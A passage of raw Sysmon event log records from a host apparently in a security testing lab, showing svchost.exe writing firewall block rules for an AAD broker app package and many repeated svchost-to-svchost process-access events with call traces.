BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{DD9A8996-6D14-4C1F-B87F-64F5DAC44533}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 13241300x800000000000000010060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.514{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{6022CC20-07DD-423A-ABCB-1730C604C32F}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|Desc=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-1910091885-1573563583-1104941280-2418270861-3411158377-2822700936-2990310272|EmbedCtxt=@{Microsoft.AAD.BrokerPlugin_1000.14393.0.0_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.AAD.BrokerPlugin/resources/PackageDisplayName}| 10341000x800000000000000010059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010051Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010050Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010049Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010048Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.435{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.389{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 